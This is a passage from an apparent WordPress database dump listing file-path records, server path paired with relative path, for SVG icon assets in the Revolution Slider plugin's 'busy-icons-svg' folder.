content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart06.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart06.svg'),(2488,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart07.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart07.svg'),(2489,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart08.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart08.svg'),(2490,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart09.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart09.svg'),(2491,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart10.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart10.svg'),(2492,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart11.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart11.svg'),(2493,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart12.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart12.svg'),(2494,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart13.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart13.svg'),(2495,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart14.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart14.svg'),(2496,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart15.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart15.svg'),(2497,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart16.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart16.svg'),(2498,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart17.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart17.svg'),(2499,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart18.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart18.svg'),(2500,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart19.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart19.svg'),(2501,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart20.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart20.svg'),(2502,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart21.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart21.svg'),(2503,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chat.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chat.svg'),(2504,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/checklist.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/checklist.svg'),(2505,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/checklist2.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/checklist2.svg'),(2506,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/checklist3.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/checklist3.svg'),(2507,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chemistry.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chemistry.svg'),(2508,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chess-knight.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chess-knight.svg'),(2509,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chess-rook.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chess-rook.svg'),(2510,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chess.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chess.svg'),(2511,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/clock.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/clock.svg'),(2512,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/closed-sign.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/closed-sign.svg'),(2513,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/cloud-coins.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/cloud-coins.svg'),(2514,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/cloud-down.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/cloud-down.svg'),(2515,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/cloud-up.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/cloud-up.svg'),(2516,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/coffee.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/coffee.svg'),(2517,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/conference.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/conference.svg'),(2518,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/contact-book.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/contact-book.svg'),(2519,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/coupon.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/coupon.svg'),(2520,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/credit-card.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/credit-card.svg'),(2521,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/crown.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/crown.svg'),(2522,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/currencies.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/currencies.svg'),(2523,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/database.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/database.svg'),(2524,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/delivery.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/delivery.svg'),(2525,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/diagram-hierarchy.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/diagram-hierarchy.svg'),(2526,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/diamond.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/diamond.svg'),(2527,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/dollar.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/dollar.svg'),(2528,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/drawer.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/drawer.svg'),(2529,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/egg.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/egg.svg'),(2530,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/emblem.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/emblem.svg'),(2531,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/envelope-money.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/envelope-money.svg'),(2532,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/envelopes.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/envelopes.svg'),(2533,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/euro.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/euro.svg'),(2534,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/exchange.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/exchange.svg'),(2535,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/exit.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/exit.svg'),(2536,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/factory.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/factory.svg'),(2537,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/fax.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/fax.svg'),(2538,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file01.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file01.svg'),(2539,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file02.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file02.svg'),(2540,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file03.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file03.svg'),(2541,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file04.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file04.svg'),(2542,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file05.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file05.svg'),(2543,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file06.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file06.svg'),(2544,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file07.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file07.svg'),(2545,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file08.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file08.svg'),(2546,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file09.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file09.svg'),(2547,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file10.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file10.svg'),(2548,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/files.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/files.svg'),(2549,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/fire.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/fire.svg'),(2550,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/fish.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/fish.svg'),(2551,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/flag.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/flag.svg'),(2552,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder-add.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder-add.svg'),(2553,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder-delete.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder-delete.svg'),(2554,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder-online.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder-online.svg'),(2555,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder-private.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder-private.svg'),(2556,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder-remove.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder-remove.svg'),(2557,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder.svg'),(2558,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folders.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folders.svg'),(2559,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/funnel-money.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/funnel-money.svg'),(2560,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/funnel.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/funnel.svg'),(2561,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/gauge.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/gauge.svg'),(2562,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/gauge2.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/gauge2.svg'),(2563,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/gears1.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/gears1.svg'),(2564,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/gears2.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/gears2.svg'),(2565,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/glasses-moustache.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/glasses-moustache.svg'),(2566,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/globe-money.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/globe-money.svg'),(2567,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/globe.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/globe.svg'),(2568,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/globe2.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/globe2.svg'),(2569,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/graduation-hat.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/graduation-hat.svg'),(2570,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-globe.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-globe.svg'),(2571,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-key.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-key.svg'),(2572,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-money.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-money.svg'),(2573,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-money2.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-money2.svg'),(2574,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/handshake.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/handshake.svg'),(2575,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hat-moustache.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hat-moustache.svg'),(2576,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hat.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hat.svg'),(2577,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-arrows.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-arrows.svg'),(2578,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-battery.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-battery.svg'),(2579,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-check.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-check.svg'),(2580,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-compass.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-compass.svg'),(2581,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-dollar.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-dollar.svg'),(2582,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-exclamation.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-exclamation.svg'),(2583,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-flash.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-flash.svg'),(2584,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-gauge.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-gauge.svg'),(2585,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-gears.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-gears.svg'),(2586,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-hourglass.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-hourglass.svg'),(2587,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-idea.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-idea.svg'),(2588,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-question.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-question.svg'),(2589,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-structure.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-structure.svg'),(2590,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head.svg'),(2591,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/headquarters.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/headquarters.svg'),(2592,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hourglass.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hourglass.svg'),(2593,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hours.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hours.svg'),(2594,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/incoming.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/incoming.svg'),(2595,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/ingots.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/ingots.svg'),(2596,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/key.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/key.svg'),(2597,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/key2.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/key2.svg'),(2598,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/keyboard.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/keyboard.svg'),(2599,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/label.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/label.svg'),(2600,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lamp.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lamp.svg'),(2601,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-article.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-article.svg'),(2602,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-cart.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-cart.svg'),(2603,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-chart.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-chart.svg'),(2604,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-chart2.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-chart2.svg'),(2605,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-diagram.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-diagram.svg'),(2606,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-envelope.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-envelope.svg'),(2607,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-finance.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-finance.svg'),(2608,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-privacy.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-privacy.svg'),(2609,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-settings.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-settings.svg'),(2610,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-user.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-user.svg'),(2611,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop.svg'),(2612,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lightbulb-green.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lightbulb-green.svg'),(2613,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lightbulb.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lightbulb.svg'),(2614,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lightning.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lightning.svg'),(2615,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/like.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/like.svg'),(2616,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lock.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lock.svg'),(2617,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/magnet-money.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/magnet-money.svg'),(2618,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/magnifying-glass.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/magnifying-glass.svg'),(2619,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager-globe.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager-globe.svg'),(2620,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager-idea.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager-idea.svg'),(2621,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager01.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager01.svg'),(2622,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager02.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager02.svg'),(2623,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/meditation.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/meditation.svg'),(2624,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/megaphone.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/megaphone.svg'),(2625,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money-growth.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money-growth.svg'),(2626,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money-scales.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money-scales.svg'),(2627,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money.svg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money.svg'),(2628,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/m